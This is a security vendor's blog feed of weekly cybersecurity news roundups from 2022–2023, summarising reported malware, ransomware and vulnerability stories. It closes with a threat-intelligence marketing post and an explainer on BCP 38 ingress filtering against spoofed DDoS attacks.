DDoS Archives - Malware Patrol https://www.malwarepatrol.net/category/ddos/ Intelligent Threat Data Wed, 29 Nov 2023 14:34:18 +0000 en-US hourly 1 https://wordpress.org/?v=6.2.4 https://www.malwarepatrol.net/wp-content/uploads/2022/01/Fivcom-Icon.png DDoS Archives - Malware Patrol https://www.malwarepatrol.net/category/ddos/ 32 32 InfoSec Articles (11/21/23 – 11/28/23) https://www.malwarepatrol.net/infosec-articles-11-21-23-11-28-23/ Wed, 29 Nov 2023 14:34:18 +0000 https://www.malwarepatrol.net/?p=51000 The post InfoSec Articles (11/21/23 – 11/28/23) appeared first on Malware Patrol.

]]>

Welcome to our weekly cybersecurity roundup. In these blog posts, we feature curated articles and insights from experts, providing you with valuable information on the latest cybersecurity threats, technologies, and best practices to keep yourself and your organization safe. Whether you’re a cybersecurity professional or a concerned individual, our weekly blog post is designed to keep you informed and empowered.

For more articles, check out our #onpatrol4malware blog.

New Agent Tesla Malware Variant Using ZPAQ Compression in Email Attacks

Source: The Hacker News

A new variant of the Agent Tesla malware has been observed delivered via a lure file with the ZPAQ compression format to harvest data from several email clients and nearly 40 web browsers. Read more.

Third-party data breach affecting Canadian government could involve data from 1999

Source: The Register

The government of Canada has confirmed its data was accessed after two of its third-party service providers were attacked. The third parties both provided relocation services for public sector workers and the government is currently analyzing a “significant volume of data” which could date back to 1999. Read more.

Play Ransomware Goes Commercial – Now Offered as a Service to Cybercriminals

Source: The Hacker News

The ransomware strain known as Play is now being offered to other threat actors “as a service,” new evidence unearthed by Adlumin has revealed. Read more.

DarkGate and PikaBot Phishing Campaign is Using Qakbot Tactics

Source: Security Boulevard

The operators behind a phishing campaign that is distributing the DarkGate and PikaBot malware is using many of the techniques attributed to the notorious QakBot operation that was taken down by law enforcement agencies in August. Read more.

Citrix warns admins to kill NetScaler user sessions to block hackers

Source: BLEEPING COMPUTER

Citrix reminded admins today that they must take additional measures after patching their NetScaler appliances against the CVE-2023-4966 ‘Citrix Bleed’ vulnerability to secure vulnerable devices against attacks. Besides applying the necessary security updates, they’re also advised to wipe all previous user sessions and terminate all active ones. Read more.

Anonymous Sudan DDoS Attack Cloudflare Decoded

Source: Security Boulevard

Cloudflare swiftly acknowledged the DDoS attack, emphasizing that it exclusively impacted the www.cloudflare.com website, leaving their broader range of products and services unscathed. A Cloudflare spokesperson assured users that no customer data or services were compromised during the incident. This emphasizes that the website operates on separate infrastructure designed to prevent any collateral damage. Read more.

Malware dev says they can revive expired Google auth cookies

Source: BLEEPING COMPUTER

The Lumma information-stealer malware (aka ‘LummaC2’) is promoting a new feature that allegedly allows cybercriminals to restore expired Google cookies, which can be used to hijack Google accounts. Read more.

DPRK Hackers Masquerade as Tech Recruiters, Job Seekers

Source: DARK READING

North Korean threat actors are posing as both job recruiters and job seekers on the Web, deceiving companies and applicants for financial gain and, possibly, to gain access into Western organizations. Read more.

New Flaws in Fingerprint Sensors Let Attackers Bypass Windows Hello Login

Source: The Hacker News

The flaws were discovered by researchers at hardware and software product security and offensive research firm Blackwing Intelligence, who found the weaknesses in the fingerprint sensors from Goodix, Synaptics, and ELAN that are embedded into the devices. Read more.

Welltok Data Breach Impacted 8.5 Million Patients in the U.S.

Source: Security Affairs

The company disclosed a data breach that exposed the personal data of nearly 8.5 million patients (8,493,379) in the U.S.. On July 26, 2023, threat actors hacked the company’s MOVEit Transfer server. Read more.

ClearFake Campaign Spreads macOS AMOS Information Stealer

Source: Security Affairs

Threat actors spread Atomic Stealer (AMOS) macOS information stealer via a bogus web browser update as part of the ClearFake campaign. Read more.

PoC for Splunk Enterprise RCE flaw released (CVE-2023-46214)

Source: HELP NET SECURITY

A vulnerability researcher has published a detailed analysis of CVE-2023-46214 and has consolidated the steps required for exploitation into a Python script. If specific prerequisites are met, the script should open a remote command prompt. Read more.

Hackers Hijack Industrial Control System at US Water Utility

Source: SECURITY WEEK

The Municipal Water Authority of Aliquippa in Pennsylvania has confirmed that hackers took control of a system associated with a booster station over the weekend, but said there was no risk to the water supply. Read more.

GE servers hacked n DARPA Military Info Leaked

Source: Cybersecurity INSIDERS

General Electric, commonly referred to as GE, a multinational corporation engaged in the fields of renewable energy, aerospace, and power, has fallen prey to a cyber attack resulting in the leakage of sensitive information related to DARPA Military operations. Read more.

The post InfoSec Articles (11/21/23 – 11/28/23) appeared first on Malware Patrol.

]]>
InfoSec Articles (11/07/23 – 11/14/23) https://www.malwarepatrol.net/infosec-articles-11-07-23-11-14-23/ Wed, 15 Nov 2023 03:54:14 +0000 https://www.malwarepatrol.net/?p=50743 The post InfoSec Articles (11/07/23 – 11/14/23) appeared first on Malware Patrol.

]]>

Welcome to our weekly cybersecurity roundup. In these blog posts, we feature curated articles and insights from experts, providing you with valuable information on the latest cybersecurity threats, technologies, and best practices to keep yourself and your organization safe. Whether you’re a cybersecurity professional or a concerned individual, our weekly blog post is designed to keep you informed and empowered.

For more articles, check out our #onpatrol4malware blog.

Japan Aviation Electronics Targeted in Ransomware Attack

Source: SECURITY WEEK

While Japan Aviation Electronics has not found evidence of data exfiltration, the Alphv/BlackCat ransomware gang claims to have stolen roughly 150,000 documents from the company, including blueprints, contracts, confidential messages, and reports. Read more.

Microsoft Authenticator Restricts Suspicious MFA Notifications

Source: Latest Hacking News

The Redmond giant has recently announced introducing a new privacy feature to its authenticator app. With this feature, Microsoft Authenticator app now blocks suspicious multi-factor authentication notifications to prevent potential abuse. Read more.

Chinese multinational bank hit by ransomware

Source: HELP NET SECURITY

The state-owned Industrial and Commercial Bank of China (ICBC), which is one of the largest banks in the world, has been hit by a ransomware attack that led to disrupted trades in the US Treasury market. Read more.

After ChatGPT, Anonymous Sudan Took Down The CloudFlare Website

Source: Security Affairs

The hacktivist group Anonymous Sudan claimed responsibility for the massive distributed denial-of-service (DDoS) attack that took down the website of Cloudflare. Cloudflare confirmed that a DDoS attack took down its website for a few minutes and ponited out that it did not impact other products or services. Read more.

Threat Actors Leverage File-Sharing Service and Reverse Proxies for Credential Harvesting

Source: TREND MICRO

The attacker-controlled reverse proxies function as intermediary servers positioned between the target and a legitimate authentication endpoint, such as the Microsoft 365 login page. When a victim interacts with the fake login page, the reverse proxy presents the genuine login form, manages incoming requests, and conveys responses from the legitimate Microsoft 365 login page. Read more.

Iranian hackers launch malware attacks on Israel’s tech sector

Source: BLEEPING COMPUTER

Security researchers have tracked a new campaign from Imperial Kitten targeting transportation, logistics, and technology firms. Imperial Kitten is also known as Tortoiseshell, TA456, Crimson Sandstorm, and Yellow Liderc, and for several years it used the online persona Marcella Flores. Read more.

Unlucky Kamran: Android malware spying on Urdu-speaking residents of Gilgit-Baltistan

Source: welivesecurity

When opened on a mobile device, the Urdu version of the Hunza News website offers readers the possibility to download the Hunza News Android app directly from the website, but the app has malicious espionage capabilities. Read more.

Routers Targeted for Gafgyt Botnet [Guest Diary]

Source: SANS Internet Storm Center

The threat actor attempts to add my honeypot into a botnet so the threat actor can carry out DDoS attacks. The vulnerabilities used for the attack were default credentials and CVE-2017-17215. To prevent these attacks, make sure systems are patched and using strong credentials. Read more.

Keeping Up with Today’s Top Mobile Spyware Threat Trends

Source: CheckPoint

In this post, we will explore trends including the rise of new and more sophisticated types of mobile spyware: nation-level spyware and modified applications. We’ll also present several best practices to help you protect all your organization’s assets. Read more.

Police Seized BulletProftLink Phishing-as-a-Service (PhaaS) Platform

Source: Security Affairs

The Royal Malaysian Police announced to have dismantled the notorious BulletProftLink phishing-as-a-service (PhaaS) platform. A joint international operation conducted by the Malaysian police, the FBI, and the Australian Federal Police took down several domains employed in the cybercriminal operation. Read more.

It’s Still Easy for Anyone to Become You at Experian

Source: Krebs on Security

In the summer of 2022, KrebsOnSecurity documented the plight of several readers who had their accounts at big-three consumer credit reporting bureau Experian hijacked after identity thieves simply re-registered the accounts using a different email address. Sixteen months later, Experian clearly has not addressed this gaping lack of security. Read more.

The Lorenz Ransomware Group Hit Texas-Based Cogdell Memorial Hospital

Source: Security Affairs

The Lorenz extortion group claimed responsibility for the security breach and added the hospital to its Tor leak site. The group claims to theft of more than 400GB of data, including internal files, patient medical images, and also employee email communications. Read more.

Microsoft Warns of Fake Skills Assessment Portals Targeting IT Job Seekers

Source: The Hacker News

A sub-cluster within the infamous Lazarus Group has established new infrastructure that impersonates skills assessment portals as part of its social engineering campaigns. Microsoft attributed the activity to a threat actor it calls Sapphire Sleet, describing it as a “shift in the persistent actor’s tactics.” Read more.

Chinese APT Targeting Cambodian Government

Source: Unit 42 by Palo Alto

Unit 42 has identified malicious Chinese APT infrastructure masquerading as cloud backup services. Monitoring telemetry associated with two prominent Chinese APT groups, we observed network connections predominately originating from the country of Cambodia, including inbound connections originating from at least 24 Cambodian government organizations. Read more.

The post InfoSec Articles (11/07/23 – 11/14/23) appeared first on Malware Patrol.

]]>
InfoSec Articles (10/24/23 – 10/31/23) https://www.malwarepatrol.net/infosec-articles-10-24-23-10-31-23/ Wed, 01 Nov 2023 06:44:50 +0000 https://www.malwarepatrol.net/?p=50707 The post InfoSec Articles (10/24/23 – 10/31/23) appeared first on Malware Patrol.

]]>

Welcome to our weekly cybersecurity roundup. In these blog posts, we feature curated articles and insights from experts, providing you with valuable information on the latest cybersecurity threats, technologies, and best practices to keep yourself and your organization safe. Whether you’re a cybersecurity professional or a concerned individual, our weekly blog post is designed to keep you informed and empowered.

For more articles, check out our #onpatrol4malware blog.

Cybercrime Supply Chain 2023:
Measurements and Assessments of Cyber Attack Resources and Where Criminals Acquire Them

Source: Interisle

Interisle researchers, using data from the Cybercrime Information Center, analyzed more than 10 million cybercrime records and found distinct, persistent patterns of exploitation and abuse covering a 365-day period from September 2022 to August 2023. Read more.

Android Malware Masquerades As Chrome Browser Reads SMS & Intercepts Emails

Source: GBHackers

Cybersecurity researchers at K7 Security Labs recently identified Rusty Droid RAT, a stealthy Android malware masquerading as a Chrome browser to read SMS and intercept emails. Read more.

The Rise of S3 Ransomware: How to Identify and Combat It

Source: The Hacker News

Despite S3 being a secure service from a reputable provider, its pivotal role in handling vast amounts of sensitive data (customer personal information, financial data, intellectual property, etc.), provides a juicy target for threat actors. Read more.

Quishing: Tricks to look out for

Source: HELP NET SECURITY

By now, most people know what a QR code looks like and that they need to scan it to get to information “embedded” in it. Unfortunately, not many users know that QR codes are not inherently safe and may be used for malicious purposes. Read more.

New iLeakage attack steals emails, passwords from Apple Safari

Source: BLEEPING COMPUTER

Academic researchers created a new speculative side-channel attack they named iLeakage that works on all recent Apple devices and can extract sensitive information from the Safari web browser. Read more.

The Danger of Forgotten Pixels on Websites: A New Case Study

Source: The Hacker News

Recently, Reflectiz, an advanced website security solution provider, released a case study focusing on a forgotten and misconfigured pixel that had been associated with a leading global healthcare provider. This overlooked piece of code surreptitiously gathered private data without user consent, potentially exposing the company to substantial fines and damage to its reputation. Read more.

ServiceNow quietly addresses unauthenticated data exposure flaw from 2015

Source: The Register

ServiceNow’s widgets act as powerful APIs for the platform’s Service Portal. Despite a code change earlier this year to improve safety, the default configuration of these widgets was to set their records public, meaning that if they’re left unchanged, they will return the type of data an attacker specifies. Read more.

The Duck is Hiring in Italy: DUCKTAIL Spread via Compromised LinkedIn Profiles
By Clus

Source: DuskRise

Cluster25 observed a malicious campaign that employs LinkedIn messages as a vector for executing identity theft attacks. In this campaign, compromised LinkedIn accounts are utilized to send messages to users with the aim of compromising their accounts by illicitly procuring their cookies, session data, and browser credentials. Read more.

Trojanized PyCharm Software Version Delivered via Google Search Ads

Source: The Hacker News

A new malvertising campaign has been observed capitalizing on a compromised website to promote spurious versions of PyCharm on Google search results by leveraging Dynamic Search Ads. Read more.

Latest Cloudflare distributed denial-of-service report details record-setting attack

Source: silicon ANGLE

The record-breaking attack in question hit an unprecedented 201 million requests per second. The figure is notably higher than the previous largest recorded attack, which stood at 71 million rps and was detailed by Cloudflare in February. Read more.

A cascade of compromise: unveiling Lazarus’ new campaign

Source: SECURELIST

The adversary demonstrated a high level of sophistication, employing advanced evasion techniques and introducing SIGNBT malware for victim control. In addition, other malware found in memory included Lazarus’ prominent LPEClient, a tool known for victim profiling and payload delivery that has previously been observed in attacks on defense contractors and the cryptocurrency industry. Read more.

Citrix Bleed: Leaking Session Tokens with CVE-2023-4966

Source: Assetnote

Earlier this month Citrix released a security bulletin which mentioned “unauthenticated buffer-related vulnerabilities” and two CVEs. These issues affected Citrix NetScaler ADC and NetScaler Gateway. Read more.

Hackers Cripple Five Ontario Hospitals by Hitting a Single Service Provider

Source: Bitdefender

Five hospitals in Canada are unable to continue normal caretaking of patients due to a cyberattack against their joint service provider. Non-emergency patients are told to visit their local clinic. Read more.

Hacktivism in the Israel-Hamas Conflict | Citizen Data Leaked Using Old Malware

Source: SentinelOne

So far, the use of novel malware/scareware and tools such as Redline Stealer and PrivateLoader by these threat actors continue to target Israeli citizens, businesses, and critical sector entities, causing data leaks and widespread disruptions. Read more.

The post InfoSec Articles (10/24/23 – 10/31/23) appeared first on Malware Patrol.

]]>
InfoSec Articles (10/10/23 – 10/17/23) https://www.malwarepatrol.net/infosec-articles-10-10-23-10-17-23/ Wed, 18 Oct 2023 10:01:27 +0000 https://www.malwarepatrol.net/?p=50672 The post InfoSec Articles (10/10/23 – 10/17/23) appeared first on Malware Patrol.

]]>

Welcome to our weekly cybersecurity roundup. In these blog posts, we feature curated articles and insights from experts, providing you with valuable information on the latest cybersecurity threats, technologies, and best practices to keep yourself and your organization safe. Whether you’re a cybersecurity professional or a concerned individual, our weekly blog post is designed to keep you informed and empowered.

For more articles, check out our #onpatrol4malware blog.

Threat Actor Profile: Strox Phishing-as-a-Service

Source: PhishLABS

Strox has become one of the most complete phishing solutions for fraud actors available, offering advanced phishing kits, hosting services, mail spam scripts, and an automated market for selling stolen credentials. Read more.

The Art of Concealment: A New Magecart Campaign That’s Abusing 404 Pages

Source: Akamai

This campaign stands out because of its three advanced concealment techniques, one of which we had never seen before — specifically, manipulating the website’s default 404 error page to hide malicious code — that poses unique challenges for detection and mitigation. Read more.

Vulnerability Exposed in WordPress Plugin User Submitted Posts

Source: InfoSecurity Magazine

A new vulnerability in the User Submitted Posts WordPress plugin (versions 20230902 and below) has been discovered by the Patchstack team. With over 20,000 active installations, this popular plugin is used for user-generated content submissions and is developed by Plugin Planet. Read more.

ShellBot DDoS Malware Installed Through Hexadecimal Notation Addresses

Source: ASEC

ASEC has recently discovered a change in the distribution method of the ShellBot malware, which is being installed on poorly managed Linux SSH servers. The overall flow remains the same, but the download URL used by the threat actor to install ShellBot has changed from a regular IP address to a hexadecimal value. Read more.

Microsoft: State hackers exploiting Confluence zero-day since September

Source: BLEEPING COMPUTER

Microsoft says a Chinese-backed threat group tracked as ‘Storm-0062’ (aka DarkShadow or Oro0lxy) has been exploiting a critical privilege escalation zero-day in the Atlassian Confluence Data Center and Server since September 14, 2023. Read more.

Multiple Citrix NetScaler Flaw Leads to DoS Attack and Data Exposure

Source: GBHackers

Critical vulnerabilities in Citrix NetScaler ADC and NetScaler Gateway have exposed sensitive information and a denial of service attack. A malicious cyber actor can exploit one of these vulnerabilities to gain control of an affected machine. Citrix has published security upgrades to address the vulnerabilities impacting several products. Read more.

Microsoft Fixes Exploited Zero-Days in WordPad, Skype for Business

Source: SECURITY WEEK

Microsoft’s security response team on Tuesday pushed out a massive batch of software and OS updates to cover more than 100 vulnerabilities across the Windows ecosystem and warned that three of the flaws are already being exploited in the wild. Read more.

Microsoft to Phase Out NTLM in Favor of Kerberos for Stronger Authentication

Source: The Hacker News

Microsoft has announced that it plans to eliminate NT LAN Manager (NTLM) in Windows 11 in the future, as it pivots to alternative methods for authentication and bolster security. Read more.

#StopRansomware: AvosLocker Ransomware (Update)

Source: CISA

AvosLocker affiliates compromise organizations’ networks by using legitimate software and open-source remote system administration tools. AvosLocker affiliates then use exfiltration-based data extortion tactics with threats of leaking and/or publishing stolen data. Read more.

Fortinet Releases Security Updates for Multiple Products

Source: CISA

Fortinet has released security advisories addressing vulnerabilities in multiple products. These vulnerabilities may allow cyber threat actors to take control of the affected systems. Read more.

Juniper Networks Patches Over 30 Vulnerabilities in Junos OS

Source: SECURITY WEEK

The most severe of these issues is an incorrect default permissions bug that allows an unauthenticated attacker with local access to a vulnerable device to create a backdoor with root privileges. Read more.

Biggest DDoSes of all time generated by protocol 0-day in HTTP/2

Source: ars TECHNICA

Unlike other high-severity zero-days in recent years—Heartbleed or log4j, for example—which caused chaos from a torrent of indiscriminate exploits, the more recent attacks, dubbed HTTP/2 Rapid Reset, were barely noticeable to all but a select few engineers. Read more.

Ransomlooker, A New Tool To Track And Analyze Ransomware Groups’ Activities

Source: Security Affairs

The researchers have created the tool to help cybersecurity experts in their daily jobs by providing real-time updates and actionable insights. It offers various statistical insights into data, the ability to determine attack perpetrators, and incorporates filtering by country, industries, time span, and other parameters for journalistic investigations. Read more.

Dozens of Squid Proxy Vulnerabilities Remain Unpatched 2 Years After Disclosure

Source: SECURITY WEEK

Dozens of vulnerabilities affecting the Squid caching and forwarding web proxy remain unpatched two years after a researcher responsibly disclosed them to developers. Read more.

The post InfoSec Articles (10/10/23 – 10/17/23) appeared first on Malware Patrol.

]]>
InfoSec Articles (03/15/2023 – 03/28/2023) https://www.malwarepatrol.net/infosec-articles-03-15-2023-03-28-2023/ Tue, 28 Mar 2023 08:58:07 +0000 https://www.malwarepatrol.net/?p=47497 The post InfoSec Articles (03/15/2023 – 03/28/2023) appeared first on Malware Patrol.

]]>

Weekly our experts select relevant news in the cybersecurity industry. Over the last two weeks, we saw the “Earth Preta’s Cyberespionage Campaign Hits Over 200” This study on an active cyberespionage campaign delves into the structure, goals, and requirements of the organizations involved, and provides an opportunity to conduct wider intelligence analysis and insights in the development of effective countermeasures. “MacStealer: New macOS-based Stealer Malware Identified” and much more.

For more articles, check out our #onpatrol4malware blog.

MacStealer: New macOS-based Stealer Malware Identified

Source: uptycs

Uptycs has already identified three Windows-based malware families that use Telegram this year, including Titan Stealer, Parallax RAT, and HookSpoofer. Read more.

Earth Preta’s Cyberespionage Campaign Hits Over 200

Source: Trend Micro

This study on an active cyberespionage campaign delves into the structure, goals, and requirements of the organizations involved, and provides an opportunity to conduct wider intelligence analysis and insights in the development of effective countermeasures. Read more.

How scammers employ IPFS for email phishing

Source: Secure List Kaspersky

In 2022, scammers began actively using IPFS for email phishing attacks. They would place HTML files containing a phishing form in IPFS and use gateways as proxies. Read more.

Beware: Fake IRS tax email delivers Emotet malware

Source: MalwareBytes LABS

A Form W-9 is a form you fill in to confirm certain personal details with the IRS. Name, address, and Tax Identification Number are all things you can expect to fill in on one of these forms. Read more.

Google reveals 18 chip vulnerabilities threatening mobile, wearables, vehicles

Source: Malware Bytes Labs

Between late 2022 and early 2023, Project Zero reported 18 vulnerabilities in a chip powering those devices. Read more.

Exploiting aCropalypse: Recovering Truncated PNGs

Source: David Buchanan

This article assumes you’ve already heard about the aCropalypse vulnerability, aka CVE-2023-21036. If not, go read about it here (oops, this page doesn’t exist yet. Read this tweet in the meantime). Read more.

Nexus: a new Android botnet?

Source: Cleafy

On January 2023, a new Android banking trojan appeared on multiple hacking forums under the name of Nexus. However, Cleafy’s Threat Intelligence & Response Team traced the first Nexus infections way before the public announcement in June 2022. Read more.

The post InfoSec Articles (03/15/2023 – 03/28/2023) appeared first on Malware Patrol.

]]>
InfoSec Articles (02/02/2023 – 02/14/2023) https://www.malwarepatrol.net/infosec-articles-02-02-2023-02-14-2023/ Mon, 13 Feb 2023 23:56:07 +0000 https://www.malwarepatrol.net/?p=47420 The post InfoSec Articles (02/02/2023 – 02/14/2023) appeared first on Malware Patrol.

]]>

Weekly our experts select relevant news in the cybersecurity industry. Over the last two weeks, we saw the “Researchers Uncover 700+ Malicious Open Source Packages”. Also, you will see the “CISA and FBI Release ESXiArgs Ransomware Recovery Guidance”.

For more articles, check out our #onpatrol4malware blog.

Phylum Discovers Revived Crypto Wallet Address Replacement Attack

Source: Phylum

Phylum’s automated risk detection platform began alerting us to a long series of suspicious publications which appear to be a revived attempt to deliver the same crypto wallet clipboard replacing malware. Read more.

Avoid Being a Downstream Victim of Service Provider Attacks

Source: Security Intelligence

Earlier this year, some customers of the cloud service provider DigitalOcean received emails instructing them to reset their passwords. These users hadn’t actually forgotten their passwords. Read more.

Bogus URL Shorteners Redirect Thousands of Hacked Sites in AdSense Fraud Campaign

Source: Securi

Late last year Securi reported on a malware campaign targeting thousands of WordPress websites to redirect visitors to bogus Q&A websites. Read more.

Researchers Uncover 700+ Malicious Open Source Packages

Source: Info Security

Security researchers have discovered another sizeable haul of malicious packages on the npm and PyPI open source registries, which could cause issues if unwittingly downloaded by developers. Read more.

Guide to Container Management on AWS

Source: Trend Micro

There are tools and services in the market that enable automation of the creation, deployment, maintenance, scaling, and monitoring of application or system containers. Read more.

CISA and FBI Release ESXiArgs Ransomware Recovery Guidance

Source: CISA

CISA and the Federal Bureau of Investigation (FBI) released a joint Cybersecurity Advisory, ESXiArgs Ransomware Virtual Machine Recovery Guidance. This advisory describes the ongoing ransomware campaign known as ESXiArgs. Read more.

THREAT ALERT: GootLoader – SEO Poisoning and Large Payloads Leading to Compromise

Source: Cybereason Incident Response Team

The Cybereason Incident Response (IR) team investigated an incident which involved new deployment methods of the GootLoader malware loader through heavily-obfuscated JavaScript files. Read more.

The post InfoSec Articles (02/02/2023 – 02/14/2023) appeared first on Malware Patrol.

]]>
InfoSec Articles (05/09/2022 – 05/23/2022) https://www.malwarepatrol.net/infosec-articles-05-09-2022-05-23-2022/ Mon, 23 May 2022 17:53:20 +0000 https://www.malwarepatrol.net/?p=44124 The post InfoSec Articles (05/09/2022 – 05/23/2022) appeared first on Malware Patrol.

]]>

Over the past two weeks, we saw The CrowdStrike Falcon OverWatch threat hunting team has uncovered a new and highly sophisticated Internet Information Services (IIS) post-exploitation framework that CrowdStrike refers to as IceApple. Also, 254% increase in activity from a Linux trojan called XorDdos. First discovered in 2014 by the research group MalwareMustDie, XorDdos was named after its denial-of-service-related.

For more articles, check out our #onpatrol4malware blog.

Custom PowerShell RAT targets Germans seeking information about the Ukraine crisis

Source: Malwarebytes Labs

The downloaded document is in fact decoy for a Remote Access Trojan (RAT) capable of stealing data and executing other malicious commands on a victim’s computer. Read more.

ICEAPPLE: A NOVEL INTERNET INFORMATION SERVICES (IIS) POST-EXPLOITATION FRAMEWORK

Source: CrowdStrike

A new and highly sophisticated Internet Information Services (IIS) post-exploitation framework that CrowdStrike refers to as IceApple. Read more.

Operation RestyLink: APT campaign targeting Japanese companies

Source: NTT

NTT SOC observed APT campaign targeting Japanese companies starting from mid of April 2022. In this article, NTT reports a detailed analysis of this campaign and discusses the attributes of the attacking group. Read more.

Twisted Panda: Chinese APT espionage operation against Russian’s state-owned defense institutes

Source: Check Point Research

In the past two months, CPR observed multiple APT groups attempting to leverage the Russia and Ukraine war as a lure for espionage operations. Read more.

Rise in XorDdos: A deeper look at the stealthy DDoS malware targeting Linux devices

Source: Microsoft 365 Defender Research Team

A 254% increase in activity from a Linux trojan called XorDdos. First discovered in 2014 by the research group MalwareMustDie, XorDdos was named after its denial-of-service-related. Read more.

Vidar distributed through backdoored Windows 11 downloads and abusing Telegram

Source: zscaler

In April 2022, ThreatLabz discovered several newly registered domains, which were created by a threat actor to spoof the official Microsoft Windows 11 OS download portal. Read more.

The post InfoSec Articles (05/09/2022 – 05/23/2022) appeared first on Malware Patrol.

]]>
Threat Intelligence: Essential For Your Cyber Defenses https://www.malwarepatrol.net/threat-intelligence-for-cyber-risk/ Thu, 09 Jan 2020 22:41:13 +0000 https://www.malwarepatrol.net/?p=35695 The post Threat Intelligence: Essential For Your Cyber Defenses appeared first on Malware Patrol.

]]>

Cyber risk is growing while confidence in internal defense resilience declining. According to Microsoft’s 2019 Global Cyber Risk Perception Survey, cyber security is a top 5 business concern for 79% of companies globally (and the top risk for 22% surveyed).

Threat intelligence (TI) is a critical component of your cybersecurity program, the defenses that mitigate cyber risk and help avoid potentially damaging incidents. For smaller businesses, this may be managed by an MSSP, but for larger enterprises, custom TI and management is a must.

What is threat intelligence?

Threat intelligence is, at its core, a collection of tagged and augmented data that can identify potential threats such as malware, ransomware, phishing attempts, botnets, cryptominers, etc. These are databased, monitored and contextually-enriched with relevant data such as IPs, URLs, system vulnerabilities targeted, implications of attack, and patterns of behaviour.

Armed with this information, your organization is able to detect incoming potential threats, set alerts and blocking, as well as engage in threat hunting activities. With a clever solution, TI is integrated with automated processes and machine learning, so analysts spend less time doing manual configuration and more time developing advanced analysis of incoming data and determining new undocumented threats. Data from external sources must seamlessly integrate into your security platforms and tools. If you can’t use it in an automated fashion, it will not likely be very helpful to your efforts.

In The Evolution of Cyber Threat Intelligence (CTI): 2019 SANS CTI Survey, 81% of respondents indicated that CTI had improved their security and response.

Why do organizations need threat intelligence?

Every day there are new threats released into the wild. Some may be obvious and/or simple to defeat; perhaps the ‘spray and pray’ type designed to impact personal data and systems which are easily detected by current organizational firewalls and network security mechanisms. Others can pose serious threats to organizational systems and data, and may even be directly targeting a particular industry, or worse still, your business itself.

Your organization needs real-time, accurate TI to give it the best chance at deflecting attacks.

Threat intelligence can help:

● Identify new threats targeting your business or industry

● Engage in threat hunting activities

● Decrease incident response time

● Prevent access to malicious resources on the Internet

● Avoid penalties and reputational losses from data exfiltration and breaches

● Identify system vulnerabilities

● Identify compromised systems

● Reduce unplanned down times

What do organizations do with threat intelligence?

TI is highly useful for cyber incident response. As per SANS Incident Handler’s Handbook, this process involves planning, identification, containment, eradication, recovery, and lessons learned.

It is also used at the identification and containment stages; incoming threats are identified, prioritized according to determined level of threat, then contained as necessary. Threats that do slip through the system can be shared with the wider community during lessons learned to keep everyone’s business healthy.

A well-functioning TIP / SIEM / SOAR and security team are both essential to ensuring threat intelligence is useful, timely, and prevents incidents. Alone, it is just one part of the process – and is only as useful as the infrastructure supporting it. It should easily integrate into your current SIEM and/or other platforms to save your security professionals’ time building out scripts to ingest data feeds.

Threat intelligence types and streams

From the SANS survey, there are four main types of threat intelligence:

● Indicators of Compromise a.k.a. IOCs (e.g. URLs, command & control centers, IP addresses, newly registered domains, etc)

● Threat behaviors, tactics, and procedures

● Digital footprint

● Strategic analysis of adversary

There are also a number of streams through which we can gather TI:

● Feeds from threat intelligence vendors

● Internally gathered information

● Community group feeds (ISACs, for example)

● Free feeds from security vendors

● Media reports

● Open source (or non-commercial) feeds

While everyone loves a freebie, open source and free feeds aren’t usually the best route to go down. The information they provide may be outdated, duplicated and/or need filtering and reformatting. Threat intelligence vendors such as Malware Patrol continuously process threat intelligence data drawn from internal and external sources to ensure it’s up-to-date, vetted, well-formatted, contextualized and enriched, before releasing it to customers.

Malware Patrol has been collecting threat data for over 15 years. Contact us to request a free evaluation of our services and to learn how our feeds and packages can be tailored to your business requirements.

Andre Correa

CEO, Malware Patrol

The post Threat Intelligence: Essential For Your Cyber Defenses appeared first on Malware Patrol.

]]>
Spoofed DDoS Attacks and BCP 38 https://www.malwarepatrol.net/spoofed-ddos-attacks-and-bcp-38/ Tue, 12 Jul 2016 12:39:55 +0000 https://www.malwarepatrol.net/?p=25953 The post Spoofed DDoS Attacks and BCP 38 appeared first on Malware Patrol.

]]>

The majority of recent DDoS attacks utilize source address spoofing techniques. These spoofed DDos attacks complicate mitigation efforts and hide the IP address of the originating system. It happens with TCP SYN floods as well as UDP amplification and reflection attacks. This post was created to raise awareness on the existence of best practices to prevent address spoofing. Administrators of networks connected to the Internet are urged to implement ingress filtering according to BCP 38 and RFC 3704 to prohibit the abuse of internal devices to generate spoofed packets.

spoofed DDos AttacksDDoS attacks, as the name suggests, originate from multiple devices distributed around the Internet. Packets traversing IP networks contain a header with source and destination addresses. In spoofed DDoS attacks, source addresses are modified on purpose to point to something other than the originating device. The receiving party is fooled to believe that replies must be sent to the spoofed address. Therefore, the real address of the attacker can’t be discovered.

Network administrators must enforce policies to only allow packets with legitimate source addresses to enter the Internet. This rule applies to ingress (input) traffic to border routers. Restrictions should enforce that only traffic originating from addresses assigned to the network or networks directly connected to border router interfaces is forwarded.

For example, suppose ISP A (Internet Service Provider) runs router R1 connected to the Internet on its interface f0/0 and customer X is connected to interface f1/0 with an assigned IP address range x.y.z.0/24. Traffic originating from customer X is ingress to router R1 and only packets arriving at interface f1/0 with source addresses in the range x.y.z.0/24 should be forwarded. Packets containing any other source address should be dropped on that interface, not forwarded.

It is important to drop packets, instead of blocking them, to avoid producing additional traffic by the router back to the originating network segment.

RFCs and BCPs are formal documents published by the IETF (Internet Engineering Task Force). The acronym RFC means Request For Comments. These documents describe specifications, protocols, procedures and events and are the result of committee drafting and subsequent reviews by interested parties. A designation is assigned to each RFC from the following options: informational experimental, best current practice, historic or unknown. Some informational RFCs become Internet standards and further modifications are only allowed as a new document that obsoletes the previous one. RFCs with status best current practice are referred to as BCPs.

The first RFC was published in April, 7 1969 by Steve Crocker to archive notes related to the development of ARPANET.

RFC 1 – Host Software http://tools.ietf.org/html/rfc1.html

BCP documents receive two numbers, one as a RFC and another one as a Best Current Practice. For example, BCP 38 is also RFC 2827. BCPs describe guidelines, processes, methods and other subjects not suitable for a standard. As of this writing, the last BCP is 205 from July 2016.

BCP 38 has become a critical tool to help mitigate DDoS attacks. Implementing it means your devices won’t participate on attacks that employ source address spoofing. Notice that BCP 38 doesn’t protect against floods originating from valid source IP addresses.

All providers of Internet connectivity, operating or not an AS (Autonomous Systems), are highly urged to implement ingress filtering mechanisms according to BCP 38 and RFC 3704 to prohibit attackers from using forged source addresses.

Unfortunately, this is not implemented in many networks yet. Best practices are known for a long time, the first published RFC on this subject was 2267 in 1998, followed by 2827 (BCP 38) in 2000 and 3704 (BCP 84) in 2004.

